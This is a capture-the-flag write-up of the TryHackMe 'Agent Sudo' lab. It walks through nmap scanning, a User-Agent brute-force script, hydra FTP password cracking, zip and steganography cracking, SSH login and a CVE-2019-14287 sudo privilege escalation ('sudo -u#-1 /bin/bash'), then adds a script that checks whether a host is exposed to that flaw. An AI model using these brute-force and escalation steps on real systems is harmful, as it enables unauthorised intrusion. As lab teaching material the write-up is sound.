
[Linux] Agent Sudo

This page aims to provide a clear and comprehensive write-up for the Agent Sudo room on TryHackMe. I used Kali Linux to conduct the penetration test.

Reconnaissance

As usual, we start with enumeration:

sudo nmap 10.10.74.238
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Three open ports are identified in the 1-1000 range. Let's perform a deeper scan on these ports:

sudo nmap -A -p 21,22,80 10.10.74.238
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement

Enumeration

HTTP

Starting with HTTP, let's check the website. A message indicates we need a specific user-agent, which is a "codename". Using R as a user-agent returns a message about 25 employees. We can perform a dictionary attack on the user-agent, using the letters of the alphabet as the dictionary.

import string

import requests

url = "http://10.10.74.238/"

# Candidate codenames: one request per uppercase letter
alphabet = string.ascii_uppercase

for letter in alphabet:
    headers = {
        "User-Agent": letter,
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
    }

    response = requests.get(url, headers=headers, timeout=10)

    # The default page asks for a codename; a 200 response without that
    # prompt means the letter was accepted as a valid agent codename
    if response.status_code == 200 and "codename" not in response.text:
        print(f"Agent:{letter}\n", response.text)

The output hints that the FTP password for user "chris" is weak.

FTP

Next, let's perform FTP enumeration to check for weak credentials using hydra. Given the user "chris," we'll use a dictionary attack on the password.

hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.218.217 ftp

Success! We retrieve the credentials: chris:crystal. Now, we can use this to connect to the FTP server and download any accessible files.

Steganography

The file To_agentJ.txt is accessible, but two images are unreadable. We'll use steganography techniques to extract information.

First, let's run binwalk on cutie.png to identify embedded files:

binwalk -Me cutie.png

An embedded zip file, 8702.zip, requires a password.

We can retrieve it using john:

zip2john 8702.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

The password found is "alien", which gives access to "To_agentR.txt".

cat To_agentR.txt

This file contains another passphrase. We use this to extract hidden data from cute-alien.jpg:

steghide extract -sf cute-alien.jpg

This yields additional credentials: james:hackerrules!.

The only service left is SSH. Let's hack it!

Exploitation

We can try our credentials on the SSH service. The password (hackerrules!) is entered at the prompt, since ssh does not accept it on the command line:

ssh james@10.10.218.217

It works and we get our first access to the host machine.

Privilege escalation

Upon logging in, we check sudo permissions and the version. The system is vulnerable to CVE-2019-14287, which allows privilege escalation:

sudo -l
sudo --version
sudo -u#-1 /bin/bash

Remediation
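A host-side check for the condition exploited above, added here as an example and not taken from the room or the author: it parses "sudo --version" and "sudo -l" output (the samples below are constructed, not captured from the target) and reports whether sudo predates 1.8.28, the release that fixed CVE-2019-14287, and whether a rule excludes root with "!". Both together are what the privilege escalation relies on; the fix is to upgrade sudo and to avoid "!root" Runas exclusions in sudoers.

```python
import re

# Constructed sample output (not captured from the room's machine)
SUDO_VERSION_OUTPUT = """Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
"""

SUDO_L_OUTPUT = """Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash
"""

FIXED_VERSION = (1, 8, 28)  # CVE-2019-14287 was fixed in sudo 1.8.28


def parse_sudo_version(output):
    """Return (major, minor, patch) from 'sudo --version' output, or None."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", output)
    return tuple(int(x) for x in m.groups()) if m else None


def find_negated_root_rules(output):
    """Return 'sudo -l' rule lines whose Runas list excludes root with '!'.

    '(ALL, !root) /bin/bash' is the precondition for the bug: on a vulnerable
    sudo, -u#-1 slips past the '!root' exclusion and the command runs as uid 0.
    """
    rules = []
    for line in output.splitlines():
        runas = re.match(r"\s*\(([^)]*)\)", line)  # leading "(...)" is the Runas spec
        if runas and re.search(r"!\s*root\b", runas.group(1)):
            rules.append(line.strip())
    return rules


def assess_cve_2019_14287(version_output, sudo_l_output):
    """Exposed only if the version predates the fix AND such a rule exists."""
    version = parse_sudo_version(version_output)
    rules = find_negated_root_rules(sudo_l_output)
    old = version is not None and version < FIXED_VERSION
    return {"version": version, "vulnerable_version": old,
            "negated_root_rules": rules, "exposed": old and bool(rules)}


if __name__ == "__main__":
    print(assess_cve_2019_14287(SUDO_VERSION_OUTPUT, SUDO_L_OUTPUT))
```

Run it with the real output of the two commands on a host to be audited; a version at or above 1.8.28 clears the "exposed" flag even if the rule is still present.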
